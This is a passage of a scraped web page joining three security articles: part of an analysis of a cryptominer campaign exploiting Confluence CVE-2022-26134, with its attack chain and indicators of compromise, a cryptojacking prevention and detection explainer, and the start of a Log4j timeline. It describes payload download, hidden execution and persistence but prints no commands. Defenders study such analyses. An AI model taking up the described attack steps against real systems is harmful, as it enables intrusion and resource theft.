vulnerability - CRYPTO DEEP TECH_files/y6.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"616\" height=\"96\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28254\"\u003eFigure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003cem\u003elol.ps1\u003c/em\u003e\u0026nbsp;script is injected to a PowerShell memory process.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe script verifies the processor’s architecture, using\u0026nbsp;\u003cem\u003ewmi\u003c/em\u003e\u0026nbsp;to check whether it matches its requirements.\u003cbr\u003eIt then downloads an executable file called\u0026nbsp;\u003cem\u003echeckit2\u003c/em\u003e\u0026nbsp;to the\u003cem\u003e\u0026nbsp;tmp\u003c/em\u003e\u0026nbsp;folder and runs it in hidden mode.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y7.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"585\" height=\"125\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28255\"\u003eFigure 7: The lol.ps1 script.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u003cem\u003e\u0026nbsp;checkit2.exe\u003c/em\u003e\u0026nbsp;process spawns a child process, called\u0026nbsp;\u003cem\u003eInstallUtil.exe,\u003c/em\u003e\u0026nbsp;which connects to the C\u0026amp;C server. The\u0026nbsp;\u003cem\u003eInstallUtil.exe\u003c/em\u003e\u0026nbsp;in turn spawns another child process child process,\u0026nbsp;\u003cem\u003eAddInProcess.exe,\u0026nbsp;\u003c/em\u003ewhich is the crypto miner. After a few moments of running on the victim’s machine, the\u0026nbsp;\u003cem\u003echeckit2\u003c/em\u003e\u0026nbsp;process terminates itself.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y8.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"663\" height=\"17\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28256\"\u003eFigure 8: The checkit2.exe process running on the system.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y9.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"657\" height=\"34\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28257\"\u003eFigure 9: The InstallUtil.exe process running on the system.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe malware downloads a new copy of itself, with a new name, to the Start Menu folder.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y10.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"537\" height=\"97\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28258\"\u003eFigure 10: The cloud.exe file downloaded to the Startup folder.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe crypto miner now runs on the machine and exhausts all the system’s resources:\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"725\" height=\"17\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28261\"\u003eFigure 11: Crypto wallet information.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eAttack chain\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y11.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-28259\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003eBoth attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThreat Actors\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “\u003ca href=\"https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/\"\u003e8220 gang\u003c/a\u003e”.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eCheck Point Protections:\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eIPS:\u003cbr\u003eAtlassian Confluence Remote Code Execution (CVE-2022-26134)\u003c/p\u003e\n\n\n\n\u003cp\u003eAnti-Bot:\u003cbr\u003eTrojan.WIN32.XMRig\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eIOCs:\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e198.251.86[.]46\u003c/p\u003e\n\n\n\n\u003cp\u003e51.79.175[.]139\u003c/p\u003e\n\n\n\n\u003cp\u003e167.114.114[.]169\u003c/p\u003e\n\n\n\n\u003cp\u003e146.59.198[.]38\u003c/p\u003e\n\n\n\n\u003cp\u003e51.255.171[.]23\u003c/p\u003e\n\n\n\n\u003cp\u003ea.oracleservice[.]top\u003c/p\u003e\n\n\n\n\u003cp\u003ed2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e\u003c/p\u003e\n\n\n\n\u003cp\u003e2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0\u003c/p\u003e\n\n\n\n\u003cp\u003e4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9\u003c/p\u003e\n\n\n\n\u003cp\u003e4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0\u003c/p\u003e\n\n\n\n\u003cp\u003eMonero Wallet:\u003cbr\u003e46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003ca href=\"https://blog.checkpoint.com/2022/12/20/is-cloud-native-security-good-enough/\"\u003e\u003c/a\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch1\u003eCryptojacking explained: How to prevent, detect, and recover from it\u003c/h1\u003e\n\n\n\n\u003ch3\u003eCriminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it.\u003c/h3\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eCryptojacking definition\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins.\u003c/p\u003e\n\n\n\n\u003cp\u003eRegardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice is slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eHow cryptojacking works\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCoin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed\u0026nbsp;\u003ca href=\"https://www.investopedia.com/tech/how-does-bitcoin-mining-work/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ea recent Investopedia explainer\u003c/a\u003e\u0026nbsp;on how Bitcoin mining works. “In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.”\u003c/p\u003e\n\n\n\n\u003cp\u003eEarning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time.\u003c/p\u003e\n\n\n\n\u003cp\u003eCybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptojacking attack methods\u003c/h2\u003e\n\n\n\n\u003cp\u003eThe attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eEndpoint attacks\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eIn the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure.\u003c/p\u003e\n\n\n\n\u003cp\u003eAnother method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers.\u003c/p\u003e\n\n\n\n\u003cp\u003eThese avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eScan for vulnerable servers and network devices\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eAttackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they usually are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices.\u003c/p\u003e\n\n\n\n\u003cp\u003e“We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.”\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eSoftware supply chain attacks\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eCybercriminals are targeting the software supply chain by\u0026nbsp;\u003ca href=\"https://www.csoonline.com/article/3649091/npm-javascript-registry-suffers-massive-influx-of-malware-report-says.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eseeding open-source code repositories\u003c/a\u003e\u0026nbsp;with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eLeveraging cloud infrastructure\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eMany cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A\u0026nbsp;\u003ca href=\"https://services.google.com/fh/files/misc/gcat_threathorizons_brief_nov2021.pdf\" rel=\"noreferrer noopener\" target=\"_blank\"\u003estudy last fall by Google’s Cybersecurity Action Team\u003c/a\u003e\u0026nbsp;reported that 86% of compromised cloud instances are used for cryptomining.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote\u0026nbsp;\u003ca href=\"https://www.paloaltonetworks.com/blog/security-operations/stopping-cryptojacking-attacks-with-and-without-an-agent/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ein a blog post\u003c/a\u003e.\u003c/p\u003e\n\n\n\n\u003cp\u003eOne of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems.\u003c/p\u003e\n\n\n\n\u003cp\u003e“The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security,\u0026nbsp;\u003ca href=\"https://www.cadosecurity.com/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ein a blog post\u003c/a\u003e\u0026nbsp;explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.”\u003c/p\u003e\n\n\n\n\u003ch2\u003eWhy cryptojacking is popular\u003c/h2\u003e\n\n\n\n\u003cp\u003eAccording to a\u0026nbsp;\u003ca href=\"https://reasonlabs.com/reports/reasonlabs-report.pdf\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereport\u003c/a\u003e\u0026nbsp;by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners. Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals.\u003c/p\u003e\n\n\n\n\u003cp\u003eWhen a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure.\u003c/p\u003e\n\n\n\n\u003ch2\u003eReal-world cryptojacking examples\u003c/h2\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eWatchDog targets Docker Engine API endpoints and Redis servers\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eA honeypot from the security research team at Cado Labs\u0026nbsp;\u003ca href=\"https://www.cadosecurity.com/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ediscovered\u003c/a\u003e\u0026nbsp;a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propogate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eAlibaba ECS instances in cryptomining crosshairs\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eTeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/en_us/research/21/k/groups-target-alibaba-ecs-instances-for-cryptojacking.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereported\u003c/a\u003e\u0026nbsp;that this group, along with rivals like the Kinsig gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabling security features to evade detection.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eMiner bots and backdoors use Log4J to attack VMware Horizon servers\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022. In one marked example, Sophos researchers\u0026nbsp;\u003ca href=\"https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003efound\u003c/a\u003e\u0026nbsp;earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of crypojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eSupply chain attacks via npm libraries\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software.\u003c/p\u003e\n\n\n\n\u003cp\u003eA few months after that report, researchers WhiteSource (now Mend) released an\u0026nbsp;\u003ca href=\"https://www.mend.io/npm-threat-report-for-javascript-package-registry/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eadditional report\u003c/a\u003e\u0026nbsp;that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eRomanian attackers target Linux machines with cryptomining malware\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eLast summer Bitdefender\u0026nbsp;\u003ca href=\"https://www.bitdefender.com/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ediscovered\u003c/a\u003e\u0026nbsp;a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A\u0026nbsp;\u003ca href=\"https://ir.vmware.com/websites/vmware/English/2120/us-press-release.html?airportNewsID=47b6e25a-5a8b-4189-b20d-99a6da9b1663\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereport\u003c/a\u003e\u0026nbsp;earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eCoinStomp uses sophisticated evasion tactics\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eCoinStop is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the he /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a\u0026nbsp;\u003ca href=\"https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereport\u003c/a\u003e\u0026nbsp;on the attack.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eCryptocurrency farm found in warehouse\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eCryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts\u0026nbsp;\u003ca href=\"https://www.darktrace.com/en/blog/crypto-mining-malware-uncovering-a-cryptocurrency-farm-in-a-warehouse/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ehighlighted\u003c/a\u003e\u0026nbsp;an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power,\u003c/p\u003e\n\n\n\n\u003ch2\u003eHow to prevent cryptojacking\u003c/h2\u003e\n\n\n\n\u003cp\u003eAs it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eEmploy strong endpoint protection:\u003c/strong\u003e\u0026nbsp;The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extension to minimize risk of browser-based scripts from executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003ePatch and harden servers (and everything else).\u003c/strong\u003e\u0026nbsp;Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities. Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eUse software composition analysis.\u0026nbsp;\u003c/strong\u003e\u003ca href=\"https://www.csoonline.com/article/3640808/software-composition-analysis-explained-and-how-it-identifies-open-source-software-risks.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eSoftware composition analysis (SCA)\u003c/a\u003e\u0026nbsp;tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eHunt down cloud misconfigurations.\u0026nbsp;\u003c/strong\u003eOne of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eHow to detect cryptojacking\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eTrain your help desk to look for signs of cryptomining.\u003c/strong\u003e\u0026nbsp;Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eDeploy a network monitoring solution.\u003c/strong\u003e\u0026nbsp;Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicates cryptojacking activity, no matter the device it is coming from.\u003c/p\u003e\n\n\n\n\u003cp\u003e“If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” ],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eUse cloud monitoring and container runtime security.\u0026nbsp;\u003c/strong\u003eEvolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eEngage in regular threat hunts.\u0026nbsp;\u003c/strong\u003eSince so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eMonitor your websites for cryptomining code\u003c/strong\u003e. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eHow to respond to a cryptojacking attack\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eAfter illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned. Some tips for how to respond to a cryptojacking attack include:\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eKill web-delivered scripts.\u0026nbsp;\u003c/strong\u003eFor in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eShut down compromised container instances.\u0026nbsp;\u003c/strong\u003eImmutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eReduce permissions and regenerate API keys.\u0026nbsp;\u003c/strong\u003eEradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerating API keys to prevent attackers from walking right back into the same cloud environment.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eLearn and adapt.\u003c/strong\u003e\u0026nbsp;Use the experience to better understand how the attacker was able to compromise your systems. Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eEditor’s note: This article, orginally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples.\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch1\u003eThe Apache Log4j vulnerabilities: A timeline\u003c/h1\u003e\n\n\n\n\u003ch3\u003eThe Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded.\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003ca href=\"https://www.csoonline.com/article/3644472/apache-log4j-vulnerability-actively-exploited-impacting-millions-of-java-based-apps.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eApache Log4j vulnerability\u003c/a\u003e\u0026nbsp;has made global headlines since it was discovered in early December. The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eThursday, December 9: Apache Log4j zero-day exploit discovered\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eApache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228) – dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eFriday, December 10: UK NCSC issues Log4j warning to UK organizations\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eAs the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a\u0026nbsp;\u003ca href=\"https://www.ncsc.gov.uk/news/apache-log4j-vulnerability\" rel=\"noreferrer noopener\" target=\"_blank\"\u003epublic warning\u003c/a\u003e\u0026nbsp;to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eSaturday, December 11: CISA director comments on 